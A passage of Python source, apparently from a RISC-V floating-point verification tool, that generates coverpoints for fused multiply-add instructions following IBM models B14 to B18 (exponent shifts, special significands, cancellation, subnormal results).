rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp)
rs3_num = float.fromhex(rs3_num)
b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp) + ' --> Difference smaller than -(2*p + 1)')
if mul_exp-((2*mant_bits)+1) < -1*exp_max: exp1 = -1*exp_max
else: exp1 = mul_exp-((2*mant_bits)+1)
if mul_exp+mant_bits+1 > exp_max: exp2 = exp_max
else: exp2 = mul_exp+mant_bits+1
for j in range(exp1, exp2):
rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+j)
rs3_num = float.fromhex(rs3_num)
b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+j) + ' --> Values in the range [-(2*p + 1) , (p + 1)]')
rs3_exp = random.randrange(exp2, exp_max)
rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp)
rs3_num = float.fromhex(rs3_num)
b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp) + ' --> A value larger than (p + 1)')
coverpoints = []
k = 0
for c in b14_comb:
cvpt = ""
for x in range(1, 4):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, 4):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B14 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b15(flen, opcode, ops, N=-1, seed=-1):
'''
IBM Model B15 Definition:
In this model we test the combination of different shift values between the
addends, with special patterns in the significands of the addends.
For the significand of the addend and for the multiplication result we take the
cases defined in model (B9) "Special Significands on Inputs"
For the shift we take the cases defined in model (B14) "Shift – multiply-add".
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1, 2 = Random
Operand 3 ∈ Abstract Dataset in B9 + Abstract Dataset in B14
Implementation:
- Here the condition is imposed that if the value of the ops variable is 3, then each of the elements in the flip types is iterated and split into their respective sign, mantissa and exponent part.
- A mul variable is initialized and parsed to the field_dec_converter for each rs1 value in the list. Next the loop is run for the mantissa parts generated for rs1 values, where it is checked for certain patterns like the leading 0’s, leading 1’s, trailing 0’s and trailing 1’s.
- The checkerboard list is declared with the probable sequences for rs2. Here the sign and exponent are extracted from the rs1 values. Mantissa part is derived from the checkerboard list. Consecutively, if the flen value differs, then the range available varies.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
e_sz=8
exp_max = 255
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
exp_max = 127
mant_bits = 23
limnum = maxnum
elif flen == 64:
flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
e_sz=11
exp_max = 1023
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
exp_max = 1022
ieee754_limnum = '0x1.fffffffffffffp+507'
mant_bits = 52
limnum = float.fromhex(ieee754_limnum)
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fnmadd':
random.seed(1)
elif opcode in 'fmsub':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
rs1 = []
b15_comb = []
comment = []
if ops == 3:
for i in range(len(flip_types)):
rs1.append(flip_types[i])
for i in range(len(rs1)):
bin_val = bin(int('1'+rs1[i][2:],16))[3:]
rs1_sgn = bin_val[0]
rs1_exp = bin_val[1:e_sz+1]
rs1_man = bin_val[e_sz+1:]
if flen == 32:
if int(rs1_exp,2) < 65: rs2_exp = 0
else : rs2_exp = random.randrange(0,int(rs1_exp,2)-65)
comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference smaller than -(2p + 1)'
rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64:
if int(rs1_exp,2) < 129: rs2_exp = 0
else : rs2_exp = random.randrange(0,int(rs1_exp,2)-129)
comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference smaller than -(2p + 1)'
rs2_exp = '{:011b}'.format(rs2_exp)
mul = fields_dec_converter(flen,rs1[i])
rs1_act = random.uniform(1,limnum)
rs2_act = mul/rs1_act
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
if flen == 32:
if int(rs1_exp,2) > 222: rs2_exp = 255
else : rs2_exp = random.randrange(int(rs1_exp,2)+33, 255)
comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference greater than (p + 1)'
rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64:
if int(rs1_exp,2) > 958: rs2_exp = 1023
else : rs2_exp = random.randrange(int(rs1_exp,2)+65, 1023)
comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference greater than (p + 1)'
rs2_exp = '{:011b}'.format(rs2_exp)
mul = fields_dec_converter(flen,rs1[i])
rs1_act = random.uniform(1,limnum)
rs2_act = mul/rs1_act
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
if flen == 32:
ul = int(rs1_exp,2)+33
ll = int(rs1_exp,2)-65
if int(rs1_exp,2) >= 222: ul = 255
if int(rs1_exp,2) < 65: ll = 0
elif flen == 64:
ul = int(rs1_exp,2)+65
ll = int(rs1_exp,2)-129
if int(rs1_exp,2) >= 958: ul = 1023
if int(rs1_exp,2) < 129: ll = 0
for expval in range (ll, ul):
rs2_exp = expval
if flen == 32:
comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference between -(2p+1) and (p+1)'
rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64:
comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference between -(2p+1) and (p+1)'
rs2_exp = '{:011b}'.format(rs2_exp)
mul = fields_dec_converter(flen,rs1[i])
rs1_act = random.uniform(1,limnum)
rs2_act = mul/rs1_act
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
coverpoints = []
k = 0
for c in b15_comb:
cvpt = ""
for x in range(1, 4):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B15 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b16(flen, opcode, ops, seed=-1):
'''
IBM Model B16 Definition:
This model tests every possible value for cancellation.
For the difference between the exponent of the intermediate result and the
maximum between the exponents of the addend and the multiplication result,
test all values in the range:
[-(2 * p + 1), 1].
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Result.exp - max(addend.exp, multiplication result.exp) ∈ [-(2 * p + 1), 1] → Condition 1
Operand 1 {operation 1} Operand 2 {operation 2} Operand 3 = Condition 1
Implementation:
- Random values of operands 1 and 2 are obtained from the random library.
- Since the objective of the test is to cancel the operands among each other constrained by the above condition, the intermediate result is calculated by the multiplication of operand 1 and 2.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
limnum = maxnum
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
ieee754_limnum = '0x1.fffffffffffffp+507'
limnum = float.fromhex(ieee754_limnum)
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fmsub':
random.seed(1)
elif opcode in 'fnmadd':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
b17_comb = []
for i in range(200):
rs1 = random.uniform(minsubnorm,limnum)
rs2 = random.uniform(minsubnorm,limnum)
ir = random.uniform(minsubnorm,rs1*rs2)
if opcode in 'fmadd':
if flen == 32:
rs3 = ir - rs1*rs2
elif flen == 64:
rs3 = Decimal(ir) - Decimal(rs1)*Decimal(rs2)
elif opcode in 'fnmadd':
if flen == 32:
rs3 = -1*rs1*rs2 - ir
elif flen == 64:
rs3 = -1*Decimal(rs1)*Decimal(rs2) - Decimal(ir)
elif opcode in 'fmsub':
if flen == 32:
rs3 = rs1*rs2 - ir
elif flen == 64:
rs3 = Decimal(rs1)*Decimal(rs2) - Decimal(ir)
elif opcode in 'fnmsub':
if flen == 32:
rs3 = ir + rs1*rs2
elif flen == 64:
rs3 = Decimal(ir) + Decimal(rs1)*Decimal(rs2)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
result = []
if opcode in ['fmadd','fmsub','fnmadd','fnmsub']:
b17_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
comment = ' | Multiply-Add: Cancellation'
for c in b17_comb:
cvpt = ""
for x in range(1, 4):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B16 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b17(flen, opcode, ops, seed=-1):
'''
IBM Model B17 Definition:
This model tests all combinations of cancellation values as in model (B16), with
all possible unbiased exponent values of subnormal results.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Result.exp - max(addend.exp, multiplication result.exp) ∈ [-(2 * p + 1), 1] → Condition 1 (Exponents are subnormal)
Operand 1 {operation 1} Operand 2 {operation 2} Operand 3 = Condition 1
Implementation:
- It functions the same as model B16 with calculating the additional unbiased exponent values of subnormal results.
- Operands 1 and 2 are randomly initialized in the range and the subsequent operator value is found.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
limnum = maxnum
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
ieee754_limnum = '0x1.fffffffffffffp+507'
limnum = float.fromhex(ieee754_limnum)
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fmsub':
random.seed(1)
elif opcode in 'fnmadd':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
b17_comb = []
for i in range(200):
rs1 = random.uniform(minsubnorm,limnum)
rs2 = random.uniform(minsubnorm,limnum)
ir = random.uniform(minsubnorm,maxsubnorm)
if ir > rs1*rs2: ir = random.uniform(minsubnorm,rs1*rs2)
if opcode in 'fmadd':
if flen == 32:
rs3 = ir - rs1*rs2
elif flen == 64:
rs3 = Decimal(ir) - Decimal(rs1)*Decimal(rs2)
elif opcode in 'fnmadd':
if flen == 32:
rs3 = -1*rs1*rs2 - ir
elif flen == 64:
rs3 = -1*Decimal(rs1)*Decimal(rs2) - Decimal(ir)
elif opcode in 'fmsub':
if flen == 32:
rs3 = rs1*rs2 - ir
elif flen == 64:
rs3 = Decimal(rs1)*Decimal(rs2) - Decimal(ir)
elif opcode in 'fnmsub':
if flen == 32:
rs3 = ir + rs1*rs2
elif flen == 64:
rs3 = Decimal(ir) + Decimal(rs1)*Decimal(rs2)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
result = []
if opcode in ['fmadd','fmsub','fnmadd','fnmsub']:
b17_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
comment = ' | Multiply-Add: Cancellation ---> Subnormal result '
for c in b17_comb:
cvpt = ""
for x in range(1, 4):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B17 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b18(flen, opcode, ops, seed=-1):
'''
IBM Model B18 Definition:
This model checks different cases where the multiplication causes some event
in the product while the addition cancels this event.
1. Product: Enumerate all options for LSB, Guard and Sticky bit. Intermediate Result: Exact (Guard and Sticky are zero).
2. Product: Take overflow values from (B4) "Overflow". Intermediate Result: No overflow
3. Product: Take underflow values from model (B5) "Underflow". Intermediate Result: No underflow
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Implementation:
- Firstly, cancellation using the B3 model as base is performed.
- Next model is the replica of the B4 model which takes into account the overflow of value for guard, round and sticky bits
- The final model is obtained from the B5 model and different operations are done for underflow in decimal format.
- The operand values are calculated using the intermediate results dataset and then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fnmadd':
random.seed(1)
elif opcode in 'fmsub':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
# Cancellation of B3
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_num = []
lsb = []
for i in fsubnorm+fnorm:
if int(i[-1],16)%2 == 1:
lsb.append('1')
lsb.append('1')
else:
lsb.append('0')
lsb.append('0')
float_val = float.hex(fields_dec_converter(32,i))
if float_val[0] != '-':
ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
ieee754_num.append('-'+float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
else:
ieee754_num.append(float_val.split('p')[0][0:11]+'p'+float_val.split('p')[1])
ieee754_num.append(float_val.split('p')[0][1:11]+'p'+float_val.split('p')[1])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(2,16,2):
grs = '{:04b}'.format(i)
if ieee754_num[k][0] == '-': sign = '1'
else: sign = '0'
ir_dataset.append([ieee754_num[k].split('p')[0]+str(i)+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k] + ': Multiply add - Guard & Sticky Cancellation'])
for i in range(len(ir_dataset)):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
ieee754_num = []
lsb = []
for i in dsubnorm+dnorm:
if int(i[-1],16)%2 == 1:
lsb.append('1')
lsb.append('1')
else:
lsb.append('0')
lsb.append('0')
float_val = str(fields_dec_converter(64,i))
if float_val[0] != '-':
ieee754_num.append(float_val)
ieee754_num.append('-'+float_val)
else:
ieee754_num.append(float_val)
ieee754_num.append(float_val[1:])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(2,16,2):
grs = '{:04b}'.format(i)
if ieee754_num[k][0] == '-': sign = '1'
else: sign = '0'
